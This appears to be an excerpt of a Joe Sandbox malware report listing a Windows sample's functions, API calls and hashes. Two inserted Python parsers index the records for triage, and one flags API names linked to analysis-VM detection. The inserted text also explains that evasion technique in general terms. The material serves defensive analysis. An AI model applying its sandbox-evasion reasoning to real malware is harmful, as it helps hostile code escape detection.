                                                                                                                                                                                                                                  • Instruction ID: 460bf2d261b0c0ab4cfbd728212574de10b9f5ad59fc531115be087e0b7b7842
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62cf54ca29fee18739608754cee850365ff5bf89207bf3d3f8c84ddab51d855a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A02A423D1CB4785FA92DB34A9412F56391AFA5390F449336D80DD63A2EF3E7494E308
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                                                                                                                                                                                                  • String ID: @$@$@
                                                                                                                                                                                                                                  • API String ID: 2645093340-1177533131
                                                                                                                                                                                                                                  • Opcode ID: 1c65b00883ed967979930eeee41b73e8f6308e2d047b5592fce0dff7bc0b8292
                                                                                                                                                                                                                                  • Instruction ID: 1f00ff9f84bd394c46f0064b756943306e5d42b386eedc49af3c6249a5cee0d9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c65b00883ed967979930eeee41b73e8f6308e2d047b5592fce0dff7bc0b8292
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20513F32709AC185EBB18F25E4513EAB3A0FB88B61F444135CE9D93B88CF3DD5899B44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

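Each record above carries a Memory Dump Source, a Similarity block (API ID, Opcode ID, fuzzy hashes) and, where the function calls anything, an APIs list. The record directly above has API ID GlobalMemoryStatus$Process$CurrentInformationObjectQuery, which appears to be a condensed token form of the called APIs (CurrentInformationObjectQuery rather than QueryInformationJobObject): the function reads physical-memory status and queries a job object, host-resource values that a loader can compare against thresholds to recognise a small analysis VM. Whether this sample uses them that way is not something the report states. Reading thousands of such records by hand is impractical, so the following Python script, added here as an example and not part of Joe Sandbox or of the sample, parses this record layout and flags functions whose API names hit a watchlist. SAMPLE_REPORT is a constructed, shortened excerpt of the records on this page; the watchlist of name fragments and the reading of -1.00% as "not scored" are the editor's assumptions.

```python
"""Triage helper for the per-function records of a Joe Sandbox report (added
example, not Joe Sandbox code). It parses the text layout used above and flags
functions whose API set reads host resources. SAMPLE_REPORT is a constructed,
shortened excerpt of the records above; the watchlist is an assumption."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API bullet: "• [Part of subcall function ADDR: ]Name.Module[(args)][, ref: ADDR]"
API_CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[\w.-]+)(?:\([^)]*\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$")
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<val>-?[\d.]+)%$")
# Assumed watchlist: name fragments of APIs that query RAM, CPU count, NUMA layout
# or job-object limits, the usual inputs of a "small VM?" check.
ENV_PROBE_KEYWORDS = ("MemoryStatus", "JobObject", "SystemInfo", "AffinityMask", "NumaHighest")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: Optional[str]         # call site inside the function, when listed
    subcall_of: Optional[str]  # callee address when the call is one level down


@dataclass
class FunctionRecord:
    has_cfg: bool = False      # opened by a "Control-flow Graph" heading
    source_file: Optional[str] = None
    offset: Optional[str] = None
    api_id: list = field(default_factory=list)  # "API ID" split on '$': condensed tokens, not exact names
    opcode_id: Optional[str] = None
    uniqueness_score: Optional[float] = None    # -1.00 is read as "not scored" (assumption)
    api_calls: list = field(default_factory=list)


def _start(records, **kw):
    records.append(FunctionRecord(**kw))
    return records[-1]


def parse_records(text: str) -> list:
    """Split report text into FunctionRecord objects; a truncated final record is kept."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Control-flow Graph":
            cur = _start(records, has_cfg=True)
        elif line == "Memory Dump Source":
            # Only a CFG-opened record that has no dump yet owns this heading.
            if not (cur and cur.has_cfg and cur.source_file is None):
                cur = _start(records)
        elif line.startswith("•"):
            cur = cur or _start(records)       # bullets before any heading: text cut mid-record
            if m := API_CALL_RE.match(line):
                cur.api_calls.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"]))
            elif m := KV_RE.match(line):
                key, val = m["key"], m["val"].strip()
                if key == "Source File":
                    cur.source_file, _, rest = val.partition(", Offset: ")
                    cur.offset = rest.split(",")[0] or None
                elif key == "API ID":
                    cur.api_id = [t for t in val.split("$") if t]
                elif key == "Opcode ID":
                    cur.opcode_id = val or None
        elif (m := SCORE_RE.match(line)) and cur is not None:
            cur.uniqueness_score = float(m["val"])
            cur = None                         # the score line closes a record
    return records


def flag_environment_probes(records, keywords=ENV_PROBE_KEYWORDS):
    """Return (index, sorted matched keywords) for records whose API names hit the watchlist."""
    hits = []
    for idx, rec in enumerate(records):
        names = [t.lower() for t in rec.api_id] + [c.name.lower() for c in rec.api_calls]
        matched = sorted({kw for kw in keywords if any(kw.lower() in n for n in names)})
        if matched:
            hits.append((idx, matched))
    return hits


# Constructed excerpt of the report records above (Associated lines and some calls dropped).
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Opcode ID: f70da690df38cb77a9eebf6c1bbf438239b3850fbc342a8e413d422e42a12f72
Uniqueness Score: -1.00%
Control-flow Graph
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
• Opcode ID: 1c65b00883ed967979930eeee41b73e8f6308e2d047b5592fce0dff7bc0b8292
Uniqueness Score: -1.00%
Control-flow Graph
APIs
• FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6385C6F99), ref: 00007FF6385CC8AB
  • Part of subcall function 00007FF6385D46F0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D46FF
  • Part of subcall function 00007FF6385D46F0: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D473D
  • Part of subcall function 00007FF6385D0580: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6385D067D
• GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF6385C6F99), ref: 00007FF6385CC91A
• GetProcessAffinityMask.KERNEL32 ref: 00007FF6385CC92D
• QueryInformationJobObject.KERNEL32 ref: 00007FF6385CC97E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for idx, kws in flag_environment_probes(recs):
        print(f"record {idx} @ {recs[idx].offset}: {', '.join(kws)} (opcode id {recs[idx].opcode_id})")
```

Because the API ID field is condensed, match on name fragments there and on full call names where an APIs list is present; the last record in the sample is cut off before its Similarity block, as the page itself is, and is kept with its score left unset. Expect hits to include ordinary runtime start-up code (CPU-count and memory-limit discovery) as well as evasion checks, so treat a flagged function as a place to look in the disassembly, not as a verdict.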
Control-flow Graph
APIs
• FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6385C6F99), ref: 00007FF6385CC8AB
  • Part of subcall function 00007FF6385D46F0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D46FF
  • Part of subcall function 00007FF6385D46F0: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D473D
  • Part of subcall function 00007FF6385D46F0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D4769
  • Part of subcall function 00007FF6385D46F0: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D477A
  • Part of subcall function 00007FF6385D46F0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D4789
  • Part of subcall function 00007FF6385D0580: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6385D067D
• GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF6385C6F99), ref: 00007FF6385CC91A
• GetProcessAffinityMask.KERNEL32 ref: 00007FF6385CC92D
• QueryInformationJobObject.KERNEL32 ref: 00007FF6385CC97E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                                                                                                                                                                                                                                  • String ID: PROCESSOR_COUNT
                                                                                                                                                                                                                                  • API String ID: 296690692-4048346908
                                                                                                                                                                                                                                  • Opcode ID: 3bf11e6d5e1439244a3bbbd96c361e4fb2391716feba360178e73559f0d6414a
                                                                                                                                                                                                                                  • Instruction ID: b6d75afa2fa8c288499f958a4196ddf3a371bc52feea933652defbcdf328bac2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bf11e6d5e1439244a3bbbd96c361e4fb2391716feba360178e73559f0d6414a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08316033E0864286EBD49B70D4403F963B2AF44B64F440135DA8ED3796DE2EF809EB08
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph
Function at 00007FF6385F2050-00007FF6385F24A8 (the graph is rendered as an image in the original report; only its edge list survived extraction and is summarised here). Subfunctions called: 00007FF6385D4940, 00007FF6385D5760, 00007FF6385D5F50, 00007FF6385D46D0, 00007FF6385FD210, 00007FF6385D5820, 00007FF6385D5830, 00007FF6385D5920, 00007FF6385F1E40, 00007FF6385EF4B0, 00007FF6385D4A50, 00007FF6385D4980, 00007FF6385D4A30, 00007FF6385D58C0, 00007FF6385D57C0, 00007FF638604BE0, 00007FF6385F17B0, 00007FF6385C7070. Two EnterCriticalSection/LeaveCriticalSection pairs: blocks 00007FF6385F22B5/00007FF6385F22DE and 00007FF6385F2320/00007FF6385F2341.
APIs
  • Part of subcall function 00007FF6385D4940: VirtualAlloc.KERNELBASE ref: 00007FF6385D4956
  • Part of subcall function 00007FF6385D4940: VirtualFree.KERNELBASE ref: 00007FF6385D496C
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF6385DB4DF), ref: 00007FF6385F22BC
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF6385DB4DF), ref: 00007FF6385F22FD
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF6385DB4DF), ref: 00007FF6385F2327
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF6385DB4DF), ref: 00007FF6385F2348
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: CriticalSection$EnterLeaveVirtual$AllocFree
• String ID: PER_HEAP_ISOLATED data members initialization failed
• API String ID: 1836396605-1705445303
• Opcode ID: a3140103dbeb56138e99eed478704137ffa3015bd28a3af1f98f9f080676eeb0
• Instruction ID: 4f2ceb8c2e9bb0138a6210da921fb8f0e8d68fc9447528a6c9fd5273022b2e46
• Opcode Fuzzy Hash: a3140103dbeb56138e99eed478704137ffa3015bd28a3af1f98f9f080676eeb0
• Instruction Fuzzy Hash: 7AC125B3D0C682C6FAA09B31A9401F976E4AF50794F48153AE94CC67A5CF7FB148A71C
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(?,?,?,00007FF6385C6A78,?,?,?,00007FF6386ED162,?,?,?,?,?,00007FF6385C4B09), ref: 00007FF6385C6AD5
• RaiseFailFastException.KERNEL32(?,?,?,00007FF6385C6A78,?,?,?,00007FF6386ED162,?,?,?,?,?,00007FF6385C4B09), ref: 00007FF6385C6B01
• RaiseFailFastException.KERNEL32(?,?,?,00007FF6385C6A78,?,?,?,00007FF6386ED162), ref: 00007FF6385C6B3A
Strings
• Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF6385C6B26
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: ExceptionFailFastRaise$Sleep
• String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
• API String ID: 3706814929-926682358
• Opcode ID: 5749bc9cef716ec383876975da61eedf7ec20a168ee9fac1d5e2c39cbc613279
• Instruction ID: f0e6302e981dd2fbd2d28b9c30a19a4527d3cd1f174d75c37901b89ab64d7d91
• Opcode Fuzzy Hash: 5749bc9cef716ec383876975da61eedf7ec20a168ee9fac1d5e2c39cbc613279
• Instruction Fuzzy Hash: BD212E33E0A68286EB949F35E9403F937E1AF04758F08513AD94EC2392DF3EE554AA44
Uniqueness
Uniqueness Score: -1.00%
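The per-function records above (APIs, Strings, Memory Dump Source, Similarity, Uniqueness) repeat thousands of times in a full report, so in practice they are parsed rather than read. The parser below is an added example written for this page; it is not Joe Sandbox code and does not use any Joe Sandbox API. It reads the cleaned text layout of the records, splits them on the "APIs" header, and builds an index that answers the questions a triager actually asks: which functions call a given API (directly or via a subcall), and which records share an API String ID. The SAMPLE text is a constructed, abbreviated copy of two records from this page.

```python
"""Parse Joe Sandbox per-function records into structured data for triage.
Added example, not part of the Joe Sandbox report or tooling."""
import re
from collections import defaultdict

# Constructed sample: two abbreviated records in the cleaned report layout.
SAMPLE = """\
APIs
  • Part of subcall function 00007FF6385D4940: VirtualAlloc.KERNELBASE ref: 00007FF6385D4956
  • Part of subcall function 00007FF6385D4940: VirtualFree.KERNELBASE ref: 00007FF6385D496C
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF6385DB4DF), ref: 00007FF6385F22BC
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF6385DB4DF), ref: 00007FF6385F22FD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Similarity
• API ID: CriticalSection$EnterLeaveVirtual$AllocFree
• String ID: PER_HEAP_ISOLATED data members initialization failed
• API String ID: 1836396605-1705445303
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
APIs
• Sleep.KERNEL32(?,?,?,00007FF6385C6A78), ref: 00007FF6385C6AD5
• RaiseFailFastException.KERNEL32(?,?,?,00007FF6385C6A78), ref: 00007FF6385C6B01
Strings
• Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF6385C6B26
Similarity
• API ID: ExceptionFailFastRaise$Sleep
• String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
• API String ID: 3706814929-926682358
Uniqueness
Uniqueness Score: -1.00%
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
                   "Similarity", "Uniqueness", "Control-flow Graph"}

# "[Part of subcall function <addr>: ]<Name>.<Module>[(args)][,] ref: <addr>"
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]{16}): )?"
                    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_\-]+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{16})$")
# "<text>, xrefs: <addr>"  (text may itself contain commas and colons)
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-F]{16})$")


def parse_records(text):
    """Split report text into records; each record starts at an 'APIs' header."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            rec = {"apis": [], "strings": [], "dumps": [], "meta": {}}
            records.append(rec)
            section = "APIs"
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if rec is None:
            continue
        item = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                rec["apis"].append({"name": m["name"], "module": m["module"],
                                    "ref": m["ref"], "subcall": m["sub"]})
        elif section == "Strings":
            m = STRING_RE.match(item)
            if m:
                rec["strings"].append({"text": m["text"], "xref": m["xref"]})
        elif section == "Memory Dump Source":
            rec["dumps"].append(item)
        elif section in ("Similarity", "Uniqueness", "Joe Sandbox IDA Plugin"):
            key, _, value = item.partition(": ")
            if key:
                rec["meta"][key] = value
    return records


def api_index(records):
    """API name -> sorted record indices that call it (directly or via a subcall)."""
    idx = defaultdict(set)
    for i, rec in enumerate(records):
        for api in rec["apis"]:
            idx[api["name"]].add(i)
    return {name: sorted(ids) for name, ids in idx.items()}


def find_functions_calling(records, *names):
    """Record indices whose API set contains every name given (pivot for triage)."""
    wanted = set(names)
    return [i for i, rec in enumerate(records)
            if wanted <= {a["name"] for a in rec["apis"]}]


def duplicates_by_api_string_id(records):
    """API String ID -> record indices, for IDs shared by more than one record."""
    groups = defaultdict(list)
    for i, rec in enumerate(records):
        sid = rec["meta"].get("API String ID")
        if sid:
            groups[sid].append(i)
    return {sid: ids for sid, ids in groups.items() if len(ids) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for name, ids in sorted(api_index(recs).items()):
        print(f"{name:<24} records {ids}")
```

Run it against the report text saved from the browser (after stripping the indentation and "Download File" link residue, as was done for the records above); the `Part of subcall function` prefix is kept as the `subcall` field so that an API reached only through a helper is not mistaken for a direct call from the function being examined.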

APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2150560229-0
                                                                                                                                                                                                                                  • Opcode ID: 1fb8b41ab4bbba739c5773e596e3cc2a0bcea10c2fead9cf607a222727754f86
                                                                                                                                                                                                                                  • Instruction ID: 58f48c72c37b781a90bedaf757ab961229e36f997f71df973f066180f3ff0e7c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fb8b41ab4bbba739c5773e596e3cc2a0bcea10c2fead9cf607a222727754f86
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0E09BA6E5470282FB189F31F82637953616F98F96F484034CD4F46750EF3DA1959608
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 195 7ff6385d4050-7ff6385d4081 196 7ff6385d413f-7ff6385d415c GlobalMemoryStatusEx 195->196 197 7ff6385d4087-7ff6385d40a2 GetCurrentProcess call 7ff63862a7ad 195->197 199 7ff6385d41e2-7ff6385d41e5 196->199 200 7ff6385d4162-7ff6385d4165 196->200 197->196 210 7ff6385d40a8-7ff6385d40b0 197->210 201 7ff6385d41ee-7ff6385d41f1 199->201 202 7ff6385d41e7-7ff6385d41eb 199->202 204 7ff6385d41d1-7ff6385d41d4 200->204 205 7ff6385d4167-7ff6385d4172 200->205 208 7ff6385d41f3-7ff6385d41f8 201->208 209 7ff6385d41fb-7ff6385d41fe 201->209 202->201 206 7ff6385d41d6 204->206 207 7ff6385d41d9-7ff6385d41dc 204->207 211 7ff6385d4174-7ff6385d4179 205->211 212 7ff6385d417b-7ff6385d418c 205->212 206->207 214 7ff6385d41de-7ff6385d41e0 207->214 215 7ff6385d4208-7ff6385d422b call 7ff63862abf0 207->215 208->209 209->215 216 7ff6385d4200 209->216 217 7ff6385d40b2-7ff6385d40b8 210->217 218 7ff6385d411a-7ff6385d411f 210->218 213 7ff6385d4190-7ff6385d41a1 211->213 212->213 220 7ff6385d41a3-7ff6385d41a8 213->220 221 7ff6385d41aa-7ff6385d41be 213->221 224 7ff6385d4205 214->224 216->224 225 7ff6385d40c1-7ff6385d40d5 217->225 226 7ff6385d40ba-7ff6385d40bf 217->226 222 7ff6385d4131-7ff6385d4134 218->222 223 7ff6385d4121-7ff6385d4124 218->223 229 7ff6385d41c2-7ff6385d41ce 220->229 221->229 222->215 232 7ff6385d413a 222->232 230 7ff6385d412b-7ff6385d412e 223->230 231 7ff6385d4126-7ff6385d4129 223->231 224->215 227 7ff6385d40d9-7ff6385d40ea 225->227 226->227 233 7ff6385d40f3-7ff6385d4107 227->233 234 7ff6385d40ec-7ff6385d40f1 227->234 229->204 230->222 231->222 232->224 235 7ff6385d410b-7ff6385d4117 233->235 234->235 235->218
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: CurrentGlobalMemoryProcessStatus
• String ID: @
• API String ID: 3261791682-2766056989
• Opcode ID: dc1f454300948641d3d60aa85f265a4ce21df8e8954a62b4408c22d6989b7564
• Instruction ID: cc0d8ed8ff148bf295c84a0b697ece973bd9c162e26c93d4bc3982088af65dab
• Opcode Fuzzy Hash: dc1f454300948641d3d60aa85f265a4ce21df8e8954a62b4408c22d6989b7564
• Instruction Fuzzy Hash: 7B415923B09B4641F996CB7691103B9D2927F59BD1F18C331DD0EA6B44FF3EE185A604
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• EnterCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF6385F0719,?,?,?,?,00000000,00007FF6385E94DF), ref: 00007FF6386021A0
• LeaveCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF6385F0719,?,?,?,?,00000000,00007FF6385E94DF), ref: 00007FF638602216
• EnterCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF6385F0719,?,?,?,?,00000000,00007FF6385E94DF), ref: 00007FF63860226B
• LeaveCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF6385F0719,?,?,?,?,00000000,00007FF6385E94DF), ref: 00007FF638602291
Memory Dump Source
